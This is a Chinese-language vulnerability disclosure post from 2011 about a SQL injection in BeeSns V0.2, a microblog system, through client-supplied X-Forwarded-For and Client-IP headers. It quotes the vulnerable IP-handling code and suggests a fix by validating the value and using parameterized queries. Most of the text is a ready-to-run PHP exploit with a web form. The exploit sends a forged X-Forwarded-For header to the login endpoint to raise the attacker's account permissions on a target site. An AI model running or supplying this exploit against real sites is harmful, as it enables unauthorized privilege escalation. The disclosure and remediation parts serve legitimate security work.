发布日期:2011-1-27
发布作者:子仪
影响版本:BeeSns V0.2
官方地址: http://www.beesns.com/
漏洞描述:取 IP 时直接信任客户端可控的 HTTP_X_FORWARDED_FOR / HTTP_CLIENT_IP 请求头,且未做任何过滤就把该值拼进 SQL 语句,导致用户可以提交恶意参数提升自身权限。修复思路:对取到的值用 filter_var($ip, FILTER_VALIDATE_IP) 校验,校验不通过则回退到 REMOTE_ADDR,写库时改用预处理语句(参数化查询)。
这套微博系统风格挺不错的,个人比较喜欢,看代码时发现一些问题,直接看代码吧
04 | if(isset($_SERVER[HTTP_X_FORWARDED_FOR])) { |
05 | $realip= $_SERVER[HTTP_X_FORWARDED_FOR]; |
06 | } elseif(isset($_SERVER[HTTP_CLIENT_IP])) { |
07 | $realip= $_SERVER[HTTP_CLIENT_IP]; |
09 | $realip= $_SERVER[REMOTE_ADDR]; |
12 | if(getenv("HTTP_X_FORWARDED_FOR")) { |
13 | $realip= getenv( "HTTP_X_FORWARDED_FOR"); |
14 | } elseif(getenv("HTTP_CLIENT_IP")) { |
15 | $realip= getenv("HTTP_CLIENT_IP"); |
17 | $realip= getenv("REMOTE_ADDR"); |
20 | $iphide=explode(".",$realip); |
22 | $realip="$iphide[0].$iphide[1].$iphide[2].$iphide[3]";//!我不明白作者写的神马东西,IP没过滤,漏洞产生 |
老掉牙的漏洞了,纯属YY。 - -!
EXP:
03 | +---------------------------------------------------------------------------+<br> |
04 | BeeSns v0.2 Getip() Remote SQL Injection Exploit<br> |
05 | site:www.beesns.com <br> |
07 | Blog: http://www.zyday.com <br> |
09 | +---------------------------------------------------------------------------+<br>'); |
11 | if(empty($_POST[submit])) { |
14 | ini_set('max_execution_time', 0); |
17 | $username= $_POST[username]; |
18 | $password= $_POST[password]; |
25 | global$host, $path,$username,$password; |
27 | $cmd= "uId=".$username."&uPw=".$password; |
28 | $getinj="1.1.1.1',permissions=5 where uid='$username'#"; |
29 | $data= "POST ".$path."post.php?act=userLogin HTTP/1.1/r/n"; |
30 | $data.= "Accept: */*/r/n"; |
31 | $data.= "Accept-Language: zh-cn/r/n"; |
32 | $data.= "Content-Type: application/x-www-form-urlencoded/r/n"; |
33 | $data.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n"; |
34 | $data.= "Host: $host/r/n"; |
35 | $data.= "Content-Length: ".strlen($cmd)."/r/n"; |
36 | $data.= "Connection: Close/r/n"; |
37 | $data.= "X-Forwarded-For: $getinj/r/n/r/n"; |
40 | $fp= fsockopen($host, 80); |
45 | while($fp&& !feof($fp)) |
46 | $resp.= fread($fp, 1024); |
48 | if(preg_match('#(.*)charset=utf-8(.*)1(.*)1(.*)0(.*)#Uis',$resp)){ |
49 | echo"<br><font color='green'>提升权限成功!</font>"; |
51 | echo"<font color='red'>Failed!</font>"; |
56 | <form action=''method='POST'> |
58 | 二级目录:<input type='input'name='path'value='/'>*如果不是二级目录,请保持默认<br> |
59 | 用户名:<input type='input'name='username'>*您在目标站申请的用户名,<font color='red'>建议用小号测试</font><br> |
60 | 密码:<input type='input'name='password'><br> |
61 | <input type='submit'name='submit'value='提升权限'><br> |